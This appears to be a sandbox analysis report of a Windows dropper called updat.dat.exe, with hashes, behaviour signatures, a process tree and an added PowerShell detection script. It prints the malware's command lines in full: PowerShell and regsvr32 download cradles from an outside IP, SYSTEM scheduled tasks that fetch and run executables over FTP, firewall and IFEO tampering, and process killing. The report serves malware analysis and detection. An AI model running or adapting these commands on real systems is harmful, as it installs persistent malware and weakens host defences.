Analysis

max time kernel: 150s
max time network: 126s
platform: windows7_x64
resource: win7v20210410
submitted: 07-05-2021 13:01

Static task: static1
Behavioral task behavioral1: sample updat.dat.exe, resource win7v20210410
Behavioral task behavioral2: sample updat.dat.exe, resource win10v20210408
(The signatures and process tree below are from the windows7_x64 run.)

General

Target: updat.dat.exe
Size: 307KB
MD5: a6ab2c2fd64e96dcfbf2cef7b2b40863
SHA1: 072e8e442c5727d52c42cf892c58cf9f143ed2a7
SHA256: f6b85d37652472106287a32fe547d511b0da9d14d4802fc6346d38bff2d8c8a6
SHA512: 49e83aebe95241348058a5320a8737d0756247892f3b1bfe913bc2a15cf2b1040b88dc897d0b31641d5252740272901d04104cfabb3b32e747489d268eab4de7

Malware Config

Extracted: http://185.26.113.95:8095/batpower2.txt (the PowerShell second stage fetched at the end of the process tree)
Signatures

Note: PIDs are reused within the run (for example 1984 appears as lsma12.exe, timeout.exe and reg.exe at different points, and 752 as both excludess.exe and WMIC.exe), so match on image name and PID together when cross-referencing the lists below.

Blocklisted process makes network request (1 IoC)
    powershell.exe, PID 912, network flow 7

Downloads MZ/PE file

Executes dropped EXE (4 IoCs)
    PID 1984  lsma12.exe
    PID 1952  lsma12.exe
    PID 752   excludess.exe
    PID 1700  excludess2.exe
Modifies Windows Firewall (1 TTP)

Sets file execution options in registry (2 TTPs)

Stops running service(s) (3 TTPs)

YARA rule match: upx (3 IoCs)
    C:\Windows\inf\aspnet\lsma12.exe
    \Windows\inf\aspnet\lsma12.exe
    C:\Windows\inf\aspnet\lsma12.exe
Loads dropped DLL (3 IoCs)
    PID 668   cmd.exe
    PID 1672  cmd.exe
    PID 1136  cmd.exe

Drops file in Windows directory (5 IoCs), all created by powershell.exe
    \??\c:\windows\update.exe
    \??\c:\windows\inf\aspnet\excludess.exe
    \??\c:\windows\inf\aspnet\excludess2.exe
    \??\c:\windows\inf\aspnet\lsma12.exe
    \??\c:\windows\inf\aspnet\config.json

Launches sc.exe
sc.exe is the Windows utility for controlling services. Here it deletes a list of services by name and sets MpsSvc (Windows Firewall) to start automatically; see the process tree.

Enumerates physical storage devices (1 TTP)
The sample attempts to interact with connected storage/optical drives. The sandbox attaches a generic "likely ransomware" note to this rule, but nothing else in this report (no file encryption, no ransom note) supports that reading; the rest of the activity is a downloader that kills competing processes and sets up scheduled-task and WMI persistence.
Checks processor information in registry (2 TTPs, 3 IoCs)
Reading the CPU name and clock speed is a common sandbox check; it is also ordinary behaviour for a CPU-bound payload sizing its workload, so treat it as supporting evidence rather than a verdict on its own.
    lsma12.exe  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
    lsma12.exe  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
    lsma12.exe  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz

Creates scheduled task(s) (1 TTP, 3 IoCs)
schtasks is often used by malware for persistence or for post-infection execution.
    PID 1512  schtasks.exe
    PID 468   schtasks.exe
    PID 852   schtasks.exe

Delays execution with timeout.exe (1 IoC)
    PID 1984  timeout.exe

Kills process with taskkill (20 IoCs)
    taskkill.exe PIDs 1672, 1584, 852, 1308, 1988, 588, 1892, 824, 1316, 2012, 1336, 552, 1000, 1208, 656, 756, 1824, 1480, 1956, 1192
Runs net.exe

Suspicious behavior: EnumeratesProcesses (60 IoCs)
    powershell.exe PID 912 and lsma12.exe PID 1984, repeated process enumeration (60 events in total)

Suspicious behavior: LoadsDriver (1 IoC)
    PID 460 (image name not recorded by the sandbox)
Suspicious use of AdjustPrivilegeToken (64 IoCs; the list is capped at 64 entries and the last WMIC.exe entry is cut off)
    SeDebugPrivilege enabled by taskkill.exe PIDs 1336, 552, 1000, 1208, 656, 1480, 1672, 1956
    WMIC.exe PID 752 (recorded twice) and PID 1272 enabled SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege and privilege LUIDs 33, 34, 35 (SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege); the PID 1272 entry ends at SeUndockPrivilege where the 64-entry cap is reached.
    wmic.exe enables the full set of privileges available to its token on every run, so the WMIC entries are expected noise; the taskkill SeDebugPrivilege entries are the ones tied to the kill list.
Suspicious use of WriteProcessMemory (64 IoCs; each parent/child pair is recorded four times and the list is capped at 64 entries)
    PID 1360 updat.dat.exe  -> PID 1972 WScript.exe
    PID 1972 WScript.exe    -> PID 1772 cmd.exe
    PID 1772 cmd.exe        -> taskkill.exe PIDs 1336, 552, 1000, 1208, 656, 1480, 1672, 1956
    PID 1772 cmd.exe        -> reg.exe PIDs 856, 1072, 1976, 1272, 1984, 1736
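As an added example, not taken from the report or from the sample: detection logic in PowerShell that turns the behaviours flagged above (PowerShell download cradle, regsvr32 scriptlet, remote XSL via wmic, permanent WMI subscription, IFEO Debugger, SYSTEM onstart tasks, scripted FTP, allow-all firewall rule) into command-line rules and runs them over a constructed sample of command lines copied from the process tree. The rule names and patterns are my own and are tolerant of the quoting and argument-order variations seen in this run.

```powershell
# Added example (not from the sandbox report or the sample): regex rules for the
# command-line techniques this report records, applied to a constructed set of
# command lines copied from the report's process tree. Rule names are my own.

$Rules = @(
    @{ Name = 'powershell_download_cradle'
       Pattern = '(?i)powershell.*\bIEX\b.*\(New-Object\s+(System\.)?Net\.WebClient\)\.DownloadString' },
    @{ Name = 'regsvr32_remote_scriptlet'
       Pattern = '(?i)regsvr32(\.exe)?\s.*/i:https?://.*scrobj\.dll' },
    @{ Name = 'wmic_remote_xsl'
       Pattern = '(?i)wmic(\.exe)?\s.*/FORMAT:\\?"?https?://' },
    @{ Name = 'wmi_permanent_subscription'
       Pattern = '(?i)root\\subscription.*PATH\s+(__EventFilter|CommandLineEventConsumer|ActiveScriptEventConsumer|__FilterToConsumerBinding)\s+CREATE' },
    @{ Name = 'ifeo_debugger_set'
       Pattern = '(?i)Image File Execution Options\\.*\s/v\s+Debugger\b' },
    @{ Name = 'schtasks_system_onstart'
       Pattern = '(?i)schtasks\s+/create\s.*/ru\s+"?system"?\s.*/sc\s+onstart' },
    @{ Name = 'ftp_script_download'
       Pattern = '(?i)\bftp\s+-s:' },
    @{ Name = 'firewall_allow_all_tcp'
       Pattern = '(?i)netsh\s+advfirewall\s+firewall\s+add\s+rule\s.*localport=0-65535\s+action=allow' }
)

function Test-CommandLine {
    # Returns the name of every rule the command line matches (nothing if none).
    param([Parameter(Mandatory)][string]$CommandLine)
    foreach ($rule in $Rules) {
        if ($CommandLine -match $rule.Pattern) { $rule.Name }
    }
}

function Get-CommandLineDetections {
    # One object per command line that matched at least one rule.
    param([Parameter(Mandatory)][string[]]$CommandLines)
    foreach ($cl in $CommandLines) {
        $hits = @(Test-CommandLine -CommandLine $cl)
        if ($hits.Count -eq 0) { continue }
        $short = if ($cl.Length -gt 90) { $cl.Substring(0, 90) + '...' } else { $cl }
        [pscustomobject]@{ Rules = ($hits -join ', '); CommandLine = $short }
    }
}

# Constructed sample: command lines copied from this report's process tree, plus
# a WMI DELETE line and a plain taskkill that should produce no detection.
$Sample = @(
    'powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(''http://185.26.113.95:8095/batpower2.txt'')',
    'regsvr32 /u /s /i:http://185.26.113.95:8204/s.txt scrobj.dll',
    'wmic os get /FORMAT:\"http://185.26.113.95:8220/s.xsl\"',
    'wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="kvckavv4", CommandLineTemplate="cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(''http://wmi.ftp0212.site:8080/power.txt'')"',
    'wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm2_filter" DELETE',
    'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhoss.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f',
    'schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.ftp0212.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get b.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe" /ru "system" /sc onstart /F',
    'netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow',
    'taskkill /f /im msinfo.exe'
)

Get-CommandLineDetections -CommandLines $Sample | Format-Table -AutoSize -Wrap
```

The WMI CREATE line trips two rules (the subscription itself and the download cradle embedded in its CommandLineTemplate), the Mysa task trips both the SYSTEM-onstart and scripted-FTP rules, while the WMI DELETE line and the bare taskkill produce nothing. Feed Sysmon event 1 or Security 4688 command lines to Get-CommandLineDetections to run the same logic over real telemetry.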
Processes

Each entry below is [depth in the tree] image path | command line, followed by the signatures the sandbox attached to that process. Image paths resolve under SysWOW64 because the sample is 32-bit and its children inherit WOW64 file-system redirection of System32. Read as a whole, the c3m.bat batch started by n.vbs does the following: kills a long list of rival miner and tool process names; sets an Image File Execution Options Debugger of "ntsd -d" for six rival binary names, which on Windows 7 (where ntsd.exe is not shipped) makes any later launch of those names fail; denies the SYSTEM account access to rival files with cacls /e /d system; stops and deletes rival services; registers the SYSTEM-level onstart tasks Mysa and Mysa2 (scripted FTP fetch from ftp.ftp0212.site with login test / 1433) and oka (starts lsma12.exe -p); deletes other actors' scheduled tasks and WMI subscriptions; turns the firewall on with allow-all TCP rules but blocks inbound 445 and 139, and assigns an IPsec policy "win" that blocks inbound TCP 135/137/138/139/445; checks for Windows XP with ver | find "5.1."; installs its own WMI subscription (filter kvckavv3, consumer kvckavv4) that runs PowerShell download cradles, regsvr32 scriptlets and a remote XSL stylesheet; waits 40 seconds and repeats the kill pass; and finally runs the PowerShell stage from http://185.26.113.95:8095/batpower2.txt.

[1] C:\Users\Admin\AppData\Local\Temp\updat.dat.exe | "C:\Users\Admin\AppData\Local\Temp\updat.dat.exe"
    - Suspicious use of WriteProcessMemory
[2] C:\Windows\SysWOW64\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\windows\TEMP\n.vbs"
    - Suspicious use of WriteProcessMemory
[3] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Windows\temp\c3m.bat" "
    - Suspicious use of WriteProcessMemory
[4] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im msinfo.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im conhos.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im conhou.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im conhot.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im conhous.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im conhoss.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im rundll32.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhoss.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
[4] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhous.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
[4] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhot.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
[4] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhos.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
[4] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhou.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
[4] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msinfo.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
[4] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im wodCmdTerm.exe /im win1ogins.exe /im win1ogins.exe /im lsaus.exe /im lsars.exe /im lsacs.exe /im regedit.exe /im lsmsm.exe /im v5.exe /im anydesk.exe /im sqler.exe /im sqlservr.exe /im NsCpuCNMiner64.exe /im NsCpuCNMiner32.exe /im tlscntr.exe /im eter.exe /im lsmo.exe /im lsarr.exe /im convert.exe /im WinSCV.exe /im ctfmonc.exe /im lsmose.exe /im svhost.exe /im secscan.exe /im wuauser.exe /im splwow64.exe /im boy.exe /IM powered.EXE /im systems.exe /im acnom.exe /im regdrv.exe /im mscsuscr.exe /im Pviunc.exe /im Bllianc.exe /im st.exe /im nvidia_update.exe /im dether.exe /im buff2.exe /im a.exe /im lacas.exe /im lsma.exe /im lsmab.exe /im wtcs.exe /im ASBservice.exe /im vid001.exe /im netsv.exe /im uihost64 /im uihost32.exe /im wina.exe /im microsoft.net.exe /im dmw.exe /im dhcpclient.exe /im ctfnom.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\SysWOW64\cacls.exe | cacls c:\windows\temp\conhou.exe /e /d system
[4] C:\Windows\SysWOW64\cacls.exe | cacls c:\windows\temp\conhos.exe /e /d system
[4] C:\Windows\SysWOW64\cacls.exe | cacls c:\windows\temp\conhot.exe /e /d system
[4] C:\Windows\SysWOW64\cacls.exe | cacls c:\windows\system\msinfo.exe /e /d system
[4] C:\Windows\SysWOW64\cacls.exe | cacls c:\windows\debug\item.dat /e /d system
[4] C:\Windows\SysWOW64\cacls.exe | cacls c:\windows\debug\winu.bat /e /d system
[4] C:\Windows\SysWOW64\cmd.exe | cmd /c net1 stop ASBservice
[5] C:\Windows\SysWOW64\net1.exe | net1 stop ASBservice
[4] C:\Windows\SysWOW64\sc.exe | sc delete ASBservice
[4] C:\Windows\SysWOW64\net1.exe | net1 stop msupdate
[4] C:\Windows\SysWOW64\sc.exe | sc delete msupdate
[4] C:\Windows\SysWOW64\net1.exe | net1 stop clr_optimization_v4.0.30328_64
[4] C:\Windows\SysWOW64\sc.exe | sc delete clr_optimization_v4.0.30328_64
[4] C:\Windows\SysWOW64\net1.exe | net1 stop MicrosoftMsql
[4] C:\Windows\SysWOW64\sc.exe | sc delete MicrosoftMsql
[4] C:\Windows\SysWOW64\net1.exe | net1 stop netsv
[4] C:\Windows\SysWOW64\sc.exe | sc delete netsv
[4] C:\Windows\SysWOW64\net1.exe | net1 stop NetworkServices
[4] C:\Windows\SysWOW64\sc.exe | sc delete NetworkServices
[4] C:\Windows\SysWOW64\net1.exe | net1 stop "Network Remote"
[4] C:\Windows\SysWOW64\sc.exe | sc delete "Network Remote"
[4] C:\Windows\SysWOW64\net1.exe | net1 stop "WinTaskCtrlService"
[4] C:\Windows\SysWOW64\sc.exe | sc delete "WinTaskCtrlService"
[4] C:\Windows\SysWOW64\net1.exe | net1 stop remotecall
[4] C:\Windows\SysWOW64\sc.exe | sc delete remotecall
[4] C:\Windows\SysWOW64\net1.exe | net1 stop rpcept
[4] C:\Windows\SysWOW64\sc.exe | sc delete rpcept
[4] C:\Windows\SysWOW64\net1.exe | net1 stop csrss
[4] C:\Windows\SysWOW64\sc.exe | sc delete csrss
[4] C:\Windows\SysWOW64\net1.exe | net1 stop "windows audio control"
[4] C:\Windows\SysWOW64\sc.exe | sc delete "windows audio control"
[4] C:\Windows\SysWOW64\schtasks.exe | schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.ftp0212.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get b.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe" /ru "system" /sc onstart /F
    - Creates scheduled task(s)
[4] C:\Windows\SysWOW64\schtasks.exe | schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.ftp0212.site>ps&echo test>>ps&echo 1433>>ps&echo get sab.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe" /ru "system" /sc onstart /F
    - Creates scheduled task(s)
[4] C:\Windows\SysWOW64\schtasks.exe | schtasks /create /tn "oka" /tr "cmd /c start c:\windows\inf\aspnet\lsma12.exe -p" /ru "system" /sc onstart /F
    - Creates scheduled task(s)
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "MicrosoftsWindowsa" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "MicrosoftsWindowsu" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "MicrosoftsWindows" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "MicrosoftsWindowsu1" /F
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\svchost.exe'" delete
    - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\wininit.exe'" delete
    - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\csrss.exe'" delete
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\WUDFHosts.exe'" delete
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='services.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\services.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\services.exe'" delete
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='lsass.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\lsass.exe'" delete
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "Mysa3" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "ok" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "\Mysa1" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "WindowsUpdate1" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "OfficeUpdaterA" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "\Microsoft\Windows\RAC\BackUpEvent" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "WindowsUpdate3" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "at6" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "Windows_Update" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "Update" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "Update2" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "Update4" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "Update3" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "windowsinit" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "System Security Check" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "AdobeFlashPlayer" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "updat_windows" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "at1" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "at2" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete "\Microsoft\Windows\UPnP\Services" /F
[4] C:\Windows\SysWOW64\sc.exe | sc config MpsSvc start= auto
[4] C:\Windows\SysWOW64\net.exe | net start MpsSvc
[5] C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 start MpsSvc
[4] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static delete policy name=win
[4] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static delete filterlist name=Allowlist
[4] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static delete filterlist name=denylist
[4] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static delete filteraction name=allow
[4] C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall delete rule name="tcp all" dir=in
[4] C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall delete rule name="deny tcp 445" dir=in
[4] C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall delete rule name="deny tcp 139" dir=in
[4] C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall delete rule name="tcpall" dir=out
[4] C:\Windows\SysWOW64\netsh.exe | netsh advfirewall set allprofiles state on
[4] C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
[4] C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block
[4] C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="deny tcp 139" dir=in protocol=tcp localport=139 action=block
[4] C:\Windows\SysWOW64\netsh.exe | netsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow
[4] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add policy name=win
[4] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filterlist name=Allowlist
[4] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filterlist name=denylist
[4] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
[4] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
[4] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
[4] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
[4] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
[4] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filteraction name=Allow action=permit
[4] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filteraction name=deny action=block
[4] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
[4] C:\Windows\SysWOW64\netsh.exe | netsh ipsec static set policy name=win assign=y
[4] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" ver "
[4] C:\Windows\SysWOW64\find.exe | find "5.1."
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm2_filter" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm2_consumer" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="Windows Events Filter" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="Windows Events Consumer4" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="Windows Events Consumer" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='Windows Events Filter'" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckayoumm3" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="coronav" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="coronav2" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="coronav2" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='coronav2'" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckamm3" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckamm4" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckamm4" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckamm4'" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckann3" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckann4" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckann4" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckann4'" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="killmm3" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="killmm4" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="killmm4" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='killmm4'" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="kuckavv3" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="kuckavv4" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="kuckavv4" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='kuckavv4'" DELETE
